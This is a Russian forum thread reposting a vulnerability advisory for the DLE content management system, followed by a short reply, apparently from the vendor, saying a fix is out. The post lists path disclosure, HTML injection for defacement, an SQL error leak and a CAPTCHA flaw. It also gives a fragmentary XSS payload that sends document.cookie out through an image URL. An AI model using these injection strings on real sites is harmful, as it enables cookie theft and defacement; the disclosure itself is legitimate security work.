Перейти к публикации

(!!!!!!!) Баги в ДЛЕ


Рекомендованные сообщения

[Раскрытие установочного пути]

В parse.class.php выделено 12582912 байт на проверку сообщения.

Переполнение делается так: "<<><><><><><>>"

[Управление генерированием страниц]

На некоторых системах удалось выполнять простые html теги :

<br></td><plaintext></td><hr><form><input&

gt;

Что может сказаться на внешнем виде сайта, ака deface по быстрому.

[ХСС]

Угнать кукисы можно при помощи вставки картинки.

ok.gif" onmouseover=

gif?id="+document.cookie;'><!--' alt='> gif?id="+document.cookie;'><!--'>

Если установлен форум, то куки приходят и от него.

[Проблемы с SQL]

http://target.net/category/topic/ -- где topic -- это не существующая тема.

Результат: SELECT id FROM nws_category WHERE parentid=not detected ;

Может, народные умельцы, в скором времени, что и придумают. :р

[antibot]

antibot.php не справляеться со своей задачей, при одновременном коннетке

он выдаёт одинаковые картинки.

Источник: http://security.nnov.ru/Mdocument13.html

Хотелось бы узнать что Celsoft думает по этому поводу?

Ссылка на сообщение
Поделиться на других сайтах

Ух ты а мы и не знали :) пока ты будешь ждать что я думаю по этому поводу, твой сайт могут взломать, фик был выпущен еще вчера

http://forum.pc-soft.ru/index.php?showtopic=25506&hl=

Ссылка на сообщение
Поделиться на других сайтах
Гость
Эта тема закрыта для публикации сообщений.
×
×
  • Создать...